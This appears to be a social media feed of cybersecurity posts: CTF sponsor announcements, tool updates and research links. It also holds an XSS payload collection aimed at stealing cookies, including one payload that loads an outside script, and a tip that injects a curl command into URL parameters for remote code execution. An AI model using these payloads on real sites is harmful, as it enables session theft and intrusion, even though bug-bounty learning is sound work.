I think it's over. I don't think I can do it anymore. My road ends here (hopefully I succeed.)

XSS Payloads Collection 👾 1. 3aalert};throw document.cookie 2. "><a nope=""x"" onmouseover="Reflect.get(frames,'ale' 'rt')(Reflect.get(document,'coo' 'kie'))"> 3. "><button popovertarget=x>Click me</button> <input type="hidden" value="y" popover id=x onbeforetoggle=alert(document.cookie)> 4. hello1\"></span><button popovertarget=x>Click me</button><input type=hidden value=y popover id=x onbeforetoggle=prompt(document.cookie)> 5. "><button popovertarget=x>Click me</button> <input type="hidden" value="y" popover id=x onbeforetoggle=alert(document.cookie)> 6. #"></div><a href="javascript:alert(document.domain)"> 7. <div onpointerover="javascript:eval(decodeURIComponent(String.fromCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 109, 97, 105, 110, 41)))" style="width:100%;height:100vh;"></div> 8. <div onpointerover="javascript:alert(document.domain)" style="width:100%;height:100vh;"></div> 9. \u0022\u003c"><"';}};“></SCRIPT><img src=x onerror=alert(69)>${{7*7}} 10. '"><script>alert('bug4y0u')</script> 11. "><div onmouseover="alert('XSS');">Hello :)</div> 12. '"><img src=1 onerror="alert('bug4y0u')"> 13. '"><img src=1 onkarem=1 onerror="alert('bug4y0u')"> 14. "}}}}}}}}}}}}}}"><h1>bug4y0u</h1><svg><circle><set onbegin=prompt(document.cookie) attributename=fill></script> 15. <script/src=//6a.lv></script> 16. 17. 18. '"></script><script>alert(document.cookie)</script> 19. '"accesskey="x" onclick="alert(document.cookie)" x="

I'm using AI (Actual Intelligence)

Please join us in welcoming @hackinghub_io as an Official Sponsor of the East Africa Intervarsity CTF 2026. Built by hackers, for hackers, HackingHub provides practical training, realistic environments, and hands-on challenges designed to help learners develop skills. #CTF

👀 github.com/MSNightmare/Rogue…

🗣️🗣️Please join us in welcoming Hack Smater Labs as an Official Sponsor of the East Africa Intervarsity CTF 2026. From Active Directory and web application hacking to cloud security and realistic penetration testing labs, Hack Smarter Labs is helping cybersecurity pros. #CTF

SMB share enumeration via ACLs with NetExec🔥 NetExec now detects share permissions via ACL enumeration, instead of trying to write a file. In addition, we can now detect if a user has indirect access to the share, e.g. by having ACL write permissions! Made by @PytelJack🚀

We’re excited to welcome MRE Security as an Official Sponsor of the East Africa Intervarsity CTF 2026. Through education, technical content, career guidance, consulting, and community-driven learning, MRE Security continues to support growing cybersecurity professionals. #CTF

We’re proud to welcome APISEC University as an Official Sponsor of the East Africa Intervarsity CTF 2026. Together, we’re building opportunities to challenge, grow, and empower the next generation of cybersecurity talent across East Africa. #EastAfricaCTF #CyberSecurity #CTF

Beginner's intro to Linux kernel fuzzing and vulnerability research (2024, @slava_moskvin_) Part 1: slavamoskvin.com/hunting-bug… Part 2: slavamoskvin.com/finding-bug… Part 3: slavamoskvin.com/finding-bug… #Linux #cybersecurity

List of resources for getting started with IoT/embedded devices vulnerability research (@IamAlch3mist) github.com/IamAlch3mist/Awes… #infosec

We have extended deadline for registration Register using the link below: docs.google.com/forms/d/e/1F…

Chat, I don't want to be that guy, but I think Microsoft has really pissed off security researchers and we're approaching the tipping point. This Eclipse guy has really rocked the boat for Microsoft.

Still thinking about it? Registrations for East Africa Intervarsity CTF 2026 are still open. The challenge isn’t waiting. Represent your university. Build your squad. Enter the arena. PWN • WEB • CRYPTO • FORENSICS • OSINT forms.gle/podha9YSFaq48Qpn7 #EastAfricaCTF #CTF2026

?url= ❌SSRF, ✅RCE if you find a parameter which passing url then, before testing SSRF try to test RCE. 1. bypass: ?url=http://x"; [now add here your blind rce payload] 2. payload: curl${ IFS }burp-collab-link;# Join my BugBounty telegram channel: t.me/SehllSec

Small QOL update for NetExec: Ctrl C will now immediately exit NetExec without any weird stack traces🚀 However, keep in mind that this still does not exit gracefully, but immediately kills all existing threads. Only do so if necessary. Made by @T1erno_

Feel free to buy me a coffee 🤗 forks 🚀. buymeacoffee.com/alienkeric

@trailofbits Claude Code skills for security research, vulnerability detection and more github.com/trailofbits/skill… #infosec #llm

Lets Gooo!!!!! This is gonna be 🔥🔥🔥🔥